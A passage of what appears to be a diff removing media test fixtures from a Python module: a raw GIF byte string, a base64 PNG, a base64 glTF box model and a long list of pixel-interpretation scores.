},(@0(\xa9\x93\x88\xa6|h\x1f\xdf\xdf\xd5\xac\x97\xe2\xc5\xb7\xc7`POOO\x9cyhppp\xff\x80\x80\xff\x96\x96\xd7``\xcc\x99\x7f,\xb0\xcf\xbf\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\xffff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00!\xf9\x04\x01\x00\x00\xa8\x00,\x00\x00\x00\x00=\x00D\x00\x00\x08\xff\x00Q\t\x1cH\xb0\xa0\xc1\x83\x08\x13*\\\xc8\xb0\xa1\xc0\x1b\x07\x0c8\x9cHq\xa1\x89\x14\xa72F\xac\xc8\xb1\xa2\t\x1f\x19Cj\x94\xd8\xb1$B\x03\x07D\xaa\x1ci\xb2%*#3V\xcad\xe9\xb2\xa2\x9d 3s\x9e\xdaX\x93!"\x8c:\x83\xf2\xeci\xf0c\xd0\xa3!\x87\x12E\x89\xb4iR\x92.a:\x9d\xfa\xb4\xe5\x0c\x9cT\xb3\xee\x84:\xf1\x06P\xad`\x95*4\n\xb6l\xd5\x84\x06>\x99]\x1b\xb2\xc5\x9c\x83F\xda\xb0\x9d{\xe4\x84\x00\x83W\xe7\xaeM\xe2f\xd4\xa8\xbb\x03\xbd\xea5kE\x88_\xbf\x80\x0fy\x1a\\\xb6\x08\x92\xc3\x87\x01\x070\xe5\x00\x02\xe3\xa9-\x80\xc4\x80\x1cY\xe0dS\x94-_\x0ezd3\xe7\xce\xa8>\x83\x0e=Zf\x92\x13\xa7Gm\x18 \xe1\xaf\xe7\xd5\xb8+\xb7\xceX8\xf6(\xda\xa2D\xd9N\x8d\xbb\xb8n\xc6\x8e}\x8f\xfa\x12<\xf8\xf0\xcf\x11\x1a\x14\x07}|mf\xdf\x00\x9elP\xd1\\\xb8dSaJ\x95\xffz }zu\xadiLs\xa6\xb0&8\x80\x01\xdd\x9f\x9b\x8a ^<\xf9\xe9\xac\xa9:\x82\x1d{\x83\x84\xe6\xef\xc5\xf7\x1d}\xf5\xd9W\x9eq\xa2\x1d\x95\x84a\xb1\xa9\xb0\x01\x00\xdd\x05\xd8\x9c|\x04\x16X\x8a\x02\x0b0\x80\x9f\x0b=\xe8\x94\\l\x1et \n\x00\x10\x02\x08\xdf\x84\x03ZX 
\x86\x1a\x16W\x03\x87+]\xe7[\x06\x00\x96\xe8\xde\x89\xce\xa5\xa8\xe2\x8a\x19N\xf7b\x87\x19\xa5\x17\x1b\x05\xa3P\x10\xa1\x8d#\xe2X\x9b\x8e;\xf2\xd8"n/\xd6\xd5\xdf\x13\xa2x\x80$\x89\x11\x9e\xd8\x81\x16\x146\xb9#\x8b\xd3\xf9\xe6\xc1\x7f\xa2\x0cp\xe5\x99\x12\xa8\x80\xdad\x15zi!\x98\xab\xf9Ff\x99gvG$g\xdf1\xa0\x80\x9bM\xc2\t\x19\x00\x19p\xd9\x9d\x99G6\xd7Hl\xdf\x99\xc2\xc8\x9e|~\t\x88)~Q@c\x99\xa3\x0cZg\x06\x00\xf8\x96\xa8)\x0c,\xc0h\xa3\x05^\x02\xe9(\x93Rji\x84\xcb)\'\x1fn\x9d~\nj)\xa3\x0e\xffZis\x84\x06\xd7\x81\xaak\xae\xc6\x01\x07\xa0\xb5\xfa*\xac~\xc9z\xaa\x04\x03l\x80+b\xb7\x81V@\x01$\xac\xd6\xe9\xab\xb1\xd2:kpj\x0ep\xe7\xb1\xab\x9aRA\x01!\x14\xd7\xc0\x03\x8dF\x1b\xdc\x00\xd3\x8ar-\xb6\xc8\x12\x07Z\t\x15\xf0:\xdd\xb7n\x8ak\xaa(\x1ddz\xac\x14\x86\x80\x92+~\xf8\xc1\xbb\xa3\xbc\xe4\xae\xe1\x01\xbaR\xfcAG\'\\\xa4\xab\x1a\xbf\xef\x82k\xa1\xbc\x03\xa3\xeb\xd7\x1d\xa4T\xcc\x87\xc2\xc5qP\x02\xc3\xab\xf9+\x9e\xb8OH\xec\xd7\x1bYTL\x8a\x1f~\xa1\x91\xecj"\xd8\xc01n\xfe\x8e\xdaA\x06\xe7\xa2;\t)Q\xb0AJ\x15\\\xa8\xbc2h!\x14\xe0\xee\xcb\xa05\x10\xc6\xa8"s&\x07\n\x13L\xb0sA\x0b\x9b\xa2\x81\x08"h\xf02\x0f\x15\xe0\x964g2\xa8\xd1D\xd3\xa4\xe8\x01\xf5t\x1c\x14`\xc6\xcb\xcbN\x11\xe7\xd6\x87]@\xca\xd7\x8f\x90\xf2\x01\x08#\x10t\x80$\xc5\x99\xc1-\xc7?\x14\xff@\xc6\xdal\x8f\xe2\x04)b0\xb1\t)}\x84\x12J&\x04\x05\x02\xc5\x18\xb8\xd9P\xc0\x0f\x1c\x93`5h\x81_\xb0H(j\x98\xacD( \xc0`P\xc5\x8f\x83\xa6\xc1\xb6;l1\x9d\x06\x1bk\x9d4\x18:(\x1e\n\x15&sR\xb7A9\xc0Q\xf1 \x18X\x00Z\xdf<\x84\xa0:h$H^\x1cgC\\\xa0\xdc\x10\x9a\xc8\xae8\x11gdQ\x07\x01\x07!\x10\n\x11W| {\xef\xa6\x90\xb0m\x01"T B\x01<\xa8\xed\xba_X|pE\x1e\xa7\xc9\xe0D\x19\xce\xcb\xbe\x04\xf5\x08\x11\x80@\x02\xf1+\xce}\t!\xecP\xc1\x0ed\xb8\xdc\xf9\x86\xa0\x88\x8aQA\x06\x90\xc1\x02\xfc\xf2G\x83\x1c4\xc4~\xf8\xcb\x1f\xf7^v\x98D\x98\x0c\x07\xca\x1b\xc5\x05\xba\x90\xbfP`Bt\x14\x81`\x07\'\xc8/\xbf\xc8@\toC\x01)\x9c\x00\xbb\x0e\xd2\xcd$"\x94\xa0\xef\xf0\xe3\x978\xe0l\x02^ \x05\x07\xf3\x97\x00\x04\xd0\xaf%1t\xde\x0b|X\xb0\x820\x8db\x0f\xa4`\xc2\x04\x16@\x8a\x0e\xce\x8f(\x02\t\xa2\xec\x86X\xc4\xb5\x15"\x898\xc4A\xfc\x1a\x08\xc5\x82HQqT\xc4\xdc("A\n<\x08\x02\x05\x94\x90\x1d\r@\xd8E\x83|1\x14T\xbc\x80\x0e>@\n\x14\x88An\xa0\xbb]\x1b\x13\xf2F\xd9Y\xc2dg\xe8\xe1\x1e\x1d\xd2\xc7P\xa0\x10\x07\x84\xf8\xe1 \x1fx\xbf\xfc\x11\xa1\x12\x90XdG\x82\xb8FI\x02q\t/\xb4\xa4&[\x12\x10\x00;', - "png", -) -ARRAY_TO_BASE64_IMAGE = ( - "data:image/png;base64," - 
"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" -) -BASE64_MODEL3D = { - "name": "Box.gltf", - "data": 
"data:;base64,ewogICAgImFzc2V0IjogewogICAgICAgICJnZW5lcmF0b3IiOiAiQ09MTEFEQTJHTFRGIiwKICAgICAgICAidmVyc2lvbiI6ICIyLjAiCiAgICB9LAogICAgInNjZW5lIjogMCwKICAgICJzY2VuZXMiOiBbCiAgICAgICAgewogICAgICAgICAgICAibm9kZXMiOiBbCiAgICAgICAgICAgICAgICAwCiAgICAgICAgICAgIF0KICAgICAgICB9CiAgICBdLAogICAgIm5vZGVzIjogWwogICAgICAgIHsKICAgICAgICAgICAgImNoaWxkcmVuIjogWwogICAgICAgICAgICAgICAgMQogICAgICAgICAgICBdLAogICAgICAgICAgICAibWF0cml4IjogWwogICAgICAgICAgICAgICAgMS4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgLTEuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDEuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDEuMAogICAgICAgICAgICBdCiAgICAgICAgfSwKICAgICAgICB7CiAgICAgICAgICAgICJtZXNoIjogMAogICAgICAgIH0KICAgIF0sCiAgICAibWVzaGVzIjogWwogICAgICAgIHsKICAgICAgICAgICAgInByaW1pdGl2ZXMiOiBbCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgImF0dHJpYnV0ZXMiOiB7CiAgICAgICAgICAgICAgICAgICAgICAgICJOT1JNQUwiOiAxLAogICAgICAgICAgICAgICAgICAgICAgICAiUE9TSVRJT04iOiAyCiAgICAgICAgICAgICAgICAgICAgfSwKICAgICAgICAgICAgICAgICAgICAiaW5kaWNlcyI6IDAsCiAgICAgICAgICAgICAgICAgICAgIm1vZGUiOiA0LAogICAgICAgICAgICAgICAgICAgICJtYXRlcmlhbCI6IDAKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgXSwKICAgICAgICAgICAgIm5hbWUiOiAiTWVzaCIKICAgICAgICB9CiAgICBdLAogICAgImFjY2Vzc29ycyI6IFsKICAgICAgICB7CiAgICAgICAgICAgICJidWZmZXJWaWV3IjogMCwKICAgICAgICAgICAgImJ5dGVPZmZzZXQiOiAwLAogICAgICAgICAgICAiY29tcG9uZW50VHlwZSI6IDUxMjMsCiAgICAgICAgICAgICJjb3VudCI6IDM2LAogICAgICAgICAgICAibWF4IjogWwogICAgICAgICAgICAgICAgMjMKICAgICAgICAgICAgXSwKICAgICAgICAgICAgIm1pbiI6IFsKICAgICAgICAgICAgICAgIDAKICAgICAgICAgICAgXSwKICAgICAgICAgICAgInR5cGUiOiAiU0NBTEFSIgogICAgICAgIH0sCiAgICAgICAgewogICAgICAgICAgICAiYnVmZmVyVmlldyI6IDEsCiAgICAgICAgICAgICJieXRlT2Zmc2V0IjogMCwKICAgICAgICAgICAgImNvbXBvbmVudFR5cGUiOiA1MTI2LAogICAgICAgICAgICAiY291bnQiOiAyNCwKICAgICAgICAgICAgIm1heCI6IFsKICAgICAgICAgICAgICAgIDEuMCwKICAgICAgICAgICAgICAgIDEuMCwKICAgICAgICAgICAgICAgIDEuMAogICAgICAgICAgICBdLAogICAgICAgICAgICAibWluIjogWwogICAgICAgICAgICAgICAgLTEuMCwKICAgICAgICAgICAgICAgIC0xLjAsCiAgICAgICAgICAgICAgICAtMS4wCiAgICAgICAgICAgIF0sCiAgICAgICAgICAgICJ0eXBlIjogIlZFQzMiCiAgICAgICAgfSwKICAgICAgICB7CiAgICAgICAgICAgICJidWZmZXJWaWV3IjogMSwKICAgICAgICAgICAgImJ5dGVPZmZzZXQiOiAyODgsCiAgICAgICAgICAgICJjb21wb25lbnRUeXBlIjogNTEyNiwKICAgICAgICAgICAgImNvdW50IjogMjQsCiAgICAgICAgICAgICJtYXgiOiBbCiAgICAgICAgICAgICAgICAwLjUsCiAgICAgICAgICAgICAgICAwLjUsCiAgICAgICAgICAgICAgICAwLjUKICAgICAgICAgICAgXSwKICAgICAgICAgICAgIm1pbiI6IFsKICAgICAgICAgICAgICAgIC0wLjUsCiAgICAgICAgICAgICAgICAtMC41LAogICAgICAgICAgICAgICAgLTAuNQogICAgICAgICAgICBdLAogICAgICAgICAgICAidHlwZSI6ICJWRUMzIgogICAgICAgIH0KICAgIF0sCiAgICAibWF0ZXJpYWxzIjogWwogICAgICAgIHsKICAgICAgICAgICAgInBick1ldGFsbGljUm91Z2huZXNzIjogewogICAgICAgICAgICAgICAgImJhc2VDb2xvckZhY3RvciI6IFsKICAgICAgICAgICAgICAgICAgICAwLjgwMDAwMDAxMTkyMDkyOSwKICAgICAgICAgICAgICAgICAgICAwLjAsCiAgICAgICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgICAgIDEuMAogICAgICAgICAgICAgICAgXSwKICAgICAgICAgICAgICAgICJtZXRhbGxpY0ZhY3RvciI6IDAuMAogICAgICAgICAgICB9LAogICAgICAgICAgICAibmFtZSI6ICJSZWQiCiAgICAgICAgfQogICAgXSwKICAgICJidWZmZXJWaWV3cyI6IFsKICAgICAgICB7CiAgICAgICAgICAgICJidWZmZXIiOiAwLAogICAgICAgICAgICAiYnl0ZU9mZnNldCI6IDU3NiwKICAgICAgICAgICAgImJ5dGVMZW5ndGgiOiA3MiwKICAgICAgICAgICAgInRhcmdldCI6IDM0OTYzCiAgICAgICAgfSwKICAgICAgICB7CiAgICAgICAgICAgICJidWZmZXIiOiAwL
AogICAgICAgICAgICAiYnl0ZU9mZnNldCI6IDAsCiAgICAgICAgICAgICJieXRlTGVuZ3RoIjogNTc2LAogICAgICAgICAgICAiYnl0ZVN0cmlkZSI6IDEyLAogICAgICAgICAgICAidGFyZ2V0IjogMzQ5NjIKICAgICAgICB9CiAgICBdLAogICAgImJ1ZmZlcnMiOiBbCiAgICAgICAgewogICAgICAgICAgICAiYnl0ZUxlbmd0aCI6IDY0OCwKICAgICAgICAgICAgInVyaSI6ICJkYXRhOmFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbTtiYXNlNjQsQUFBQUFBQUFBQUFBQUlBL0FBQUFBQUFBQUFBQUFJQS9BQUFBQUFBQUFBQUFBSUEvQUFBQUFBQUFBQUFBQUlBL0FBQUFBQUFBZ0w4QUFBQUFBQUFBQUFBQWdMOEFBQUFBQUFBQUFBQUFnTDhBQUFBQUFBQUFBQUFBZ0w4QUFBQUFBQUNBUHdBQUFBQUFBQUFBQUFDQVB3QUFBQUFBQUFBQUFBQ0FQd0FBQUFBQUFBQUFBQUNBUHdBQUFBQUFBQUFBQUFBQUFBQUFnRDhBQUFBQUFBQUFBQUFBZ0Q4QUFBQUFBQUFBQUFBQWdEOEFBQUFBQUFBQUFBQUFnRDhBQUFBQUFBQ0F2d0FBQUFBQUFBQUFBQUNBdndBQUFBQUFBQUFBQUFDQXZ3QUFBQUFBQUFBQUFBQ0F2d0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBSUMvQUFBQUFBQUFBQUFBQUlDL0FBQUFBQUFBQUFBQUFJQy9BQUFBQUFBQUFBQUFBSUMvQUFBQXZ3QUFBTDhBQUFBL0FBQUFQd0FBQUw4QUFBQS9BQUFBdndBQUFEOEFBQUEvQUFBQVB3QUFBRDhBQUFBL0FBQUFQd0FBQUw4QUFBQS9BQUFBdndBQUFMOEFBQUEvQUFBQVB3QUFBTDhBQUFDL0FBQUF2d0FBQUw4QUFBQy9BQUFBUHdBQUFEOEFBQUEvQUFBQVB3QUFBTDhBQUFBL0FBQUFQd0FBQUQ4QUFBQy9BQUFBUHdBQUFMOEFBQUMvQUFBQXZ3QUFBRDhBQUFBL0FBQUFQd0FBQUQ4QUFBQS9BQUFBdndBQUFEOEFBQUMvQUFBQVB3QUFBRDhBQUFDL0FBQUF2d0FBQUw4QUFBQS9BQUFBdndBQUFEOEFBQUEvQUFBQXZ3QUFBTDhBQUFDL0FBQUF2d0FBQUQ4QUFBQy9BQUFBdndBQUFMOEFBQUMvQUFBQXZ3QUFBRDhBQUFDL0FBQUFQd0FBQUw4QUFBQy9BQUFBUHdBQUFEOEFBQUMvQUFBQkFBSUFBd0FDQUFFQUJBQUZBQVlBQndBR0FBVUFDQUFKQUFvQUN3QUtBQWtBREFBTkFBNEFEd0FPQUEwQUVBQVJBQklBRXdBU0FCRUFGQUFWQUJZQUZ3QVdBQlVBIgogICAgICAgIH0KICAgIF0KfQo=", -} -SUM_PIXELS_INTERPRETATION = { - "scores": [ - [ - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 
0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 
0.7775525960239336, - ], - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.8478093032233159, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 0.7775525960239336, - 